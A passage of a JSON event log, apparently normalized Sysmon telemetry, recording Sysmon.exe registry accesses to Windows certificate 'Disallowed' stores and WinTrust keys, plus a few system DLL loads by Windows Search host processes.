"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msidle.dll", - "image_path": "C:\\Windows\\System32\\msidle.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
